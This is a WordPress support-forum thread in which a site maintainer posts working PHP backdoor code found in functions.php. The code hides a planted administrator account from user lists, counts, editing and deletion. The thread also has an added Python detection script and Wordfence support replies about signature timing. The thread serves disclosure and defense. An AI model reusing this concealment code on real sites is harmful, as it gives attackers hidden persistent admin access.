• Abdallah_Mohsen

    (@abdallah_mohsen)


    Hello

    I found hack code on many websites that came to me to handle issues, and I found that Wordfence didn't even see this code or report that it's malicious code that should be removed.

    Here is the code block which I found in functions.php, and it created an admin user with all administrative permissions.

    <?php

    // Installs itself only when the hook/user functions are available and the
    // first function name is still free (the names mimic core WordPress functions).
    if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {

    // The ID of the planted account is stored in the wp_options row "_pre_user_id";
    // every hook below reads it from there.
    add_action('pre_user_query', 'wp_enqueue_async_script');   // hides that user from WP_User_Query results
    add_filter('views_users', 'wp_generate_dynamic_cache');     // lowers the user counts shown in Users > All Users
    add_action('load-user-edit.php', 'wp_add_custom_meta_box'); // blocks opening that user's edit screen
    add_action('admin_menu', 'wp_schedule_event_action');       // blocks deleting that user
    
    // Rewrites the WHERE clause of user queries so the hidden ID is excluded,
    // unless the hidden user is the one currently logged in.
    function wp_enqueue_async_script($user_search) {
        $user_id = get_current_user_id();
        $id = get_option('_pre_user_id');
    
        if (is_wp_error($id) || $user_id == $id)
            return;
    
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
            $user_search->query_where
        );
    }
    
    // Decrements the "All" and "Administrator" counts in the user list so the
    // totals still match the shortened list.
    function wp_generate_dynamic_cache($views) {
    
        $html = explode('<span class="count">(', $views['all']);
        $count = explode(')</span>', $html[1]);
        $count[0]--;
        $views['all'] = $html[0] . '<span class="count">(' . $count[0] . ')</span>' . $count[1];
    
        $html = explode('<span class="count">(', $views['administrator']);
        $count = explode(')</span>', $html[1]);
        $count[0]--;
        $views['administrator'] = $html[0] . '<span class="count">(' . $count[0] . ')</span>' . $count[1];
    
        return $views;
    }
    
    // user-edit.php?user_id=<hidden id> is answered with "Invalid user ID."
    // for everyone except the hidden user.
    function wp_add_custom_meta_box() {
        $user_id = get_current_user_id();
        $id = get_option('_pre_user_id');
    
        if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
            wp_die(__('Invalid user ID.'));
    }
    
    // Any ?action=delete request for the hidden user is refused the same way.
    function wp_schedule_event_action() {
    
        $id = get_option('_pre_user_id');
    
        if (isset($_GET['user']) && $_GET['user']
            && isset($_GET['action']) && $_GET['action'] == 'delete'
            && ($_GET['user'] == $id || !get_userdata($_GET['user'])))
            wp_die(__('Invalid user ID.'));
    
    }
    
    
    
    // $params is never defined in this sample, so this check is a leftover of the
    // stage that created the account (wp_insert_user is only tested for above).
    if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
        die('WP ADMIN USER EXISTS');
    }

    }
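As an added example, not code from this thread or from Wordfence, a Python triage script that checks a PHP file for the indicators visible in the sample above and, given the `_pre_user_id` option value and the user rows fetched from the database, resolves the account those hooks hide. The indicator names, the PHP fragments and the option/user rows are constructed for this example.

```python
import re
from typing import Optional

# Indicators taken from the functions.php sample above (constructed for this
# example; these are not Wordfence signatures).
INDICATORS = {
    "hidden_user_option": re.compile(r"get_option\(\s*['\"]_pre_user_id['\"]\s*\)"),
    "user_query_hook":    re.compile(r"add_action\(\s*['\"]pre_user_query['\"]"),
    "user_count_filter":  re.compile(r"add_filter\(\s*['\"]views_users['\"]"),
    "where_rewrite":      re.compile(r"str_replace\(\s*['\"]WHERE 1=1['\"]"),
    "admin_cookie":       re.compile(r"\$_COOKIE\[\s*['\"]WORDPRESS_ADMIN_USER['\"]\s*\]"),
}

def scan_php(source: str) -> list:
    """Return the indicator names found in one PHP file's source text."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def hides_admin_user(source: str) -> bool:
    """Flag a file when the _pre_user_id lookup is combined with a user-list
    filter; the option alone could be benign, the combination conceals an account."""
    hits = set(scan_php(source))
    return "hidden_user_option" in hits and bool(
        hits & {"user_query_hook", "user_count_filter", "where_rewrite"})

def find_hidden_user(options: dict, users: list) -> Optional[dict]:
    """The hooks hide the user whose ID is stored in wp_options._pre_user_id;
    look that row up directly in wp_users (rows are constructed here)."""
    hidden_id = str(options.get("_pre_user_id", ""))
    if not hidden_id.isdigit():
        return None
    return next((u for u in users if int(u["ID"]) == int(hidden_id)), None)

# Constructed sample input: a fragment modelled on the posted functions.php,
# a clean theme file, and the database rows a cleanup would fetch.
INFECTED = """add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
$id = get_option('_pre_user_id');
$user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id}", $user_search->query_where);"""
CLEAN = "add_action('wp_enqueue_scripts', 'theme_enqueue_styles');"
OPTIONS = {"_pre_user_id": "17"}
USERS = [{"ID": 1, "user_login": "siteowner"}, {"ID": 17, "user_login": "wp_support"}]

if __name__ == "__main__":
    print(scan_php(INFECTED), hides_admin_user(INFECTED), hides_admin_user(CLEAN))
    print(find_hidden_user(OPTIONS, USERS))
```

Running the scan over wp-content (themes, plugins, mu-plugins) and then checking the `_pre_user_id` option in the database gives both the dropper and the account it protects, which a scan of the user list alone would miss.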

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @abdallah_mohsen, thank-you for getting in touch.

    Assuming you've not disabled any firewall rules, the rules themselves are updating successfully inside the plugin, and there aren't any other issues with your site contacting our servers, I would suggest sending a copy of the suspicious code (or files containing it) to samples @ wordfence . com. Just make sure to remove any database credentials or keys/salts in any files you send over.

    Issues can sometimes be packaged in a different way to cases seen before by our scans as threats often evolve over time. If you’re able to find and clean files yourself but the issue returns later, it may be recreated by another file somewhere. If there’s another issue our Threat Intelligence team may be able to identify that and recommend the next steps you can take.

    Many thanks,
    Peter.

    Thread Starter Abdallah_Mohsen

    (@abdallah_mohsen)

    Thank you for replying.

    I was able to remove the code manually, but it reappeared. I ran another scan with Wordfence, but it didn’t detect anything—everything came back clean.

    How can I configure Wordfence to recognize this code as suspicious and ensure it removes it from any file that contains it?

    I sent an email to samples @ wordfence . com with the code already.

    Thread Starter Abdallah_Mohsen

    (@abdallah_mohsen)

    Well, after contacting support at samples @ wordfence, they replied:

    “Thank you for reaching out. The malware sample you shared is detected by Wordfence Premium since last month. Signatures will be available to free users next week, as per our policy.”

    So, essentially, if you’re using the free version, you’re vulnerable to known threats for over a month until signatures are released. This raises concerns about the effectiveness of the free version—what’s the point of installing it if it leaves users unprotected for so long?
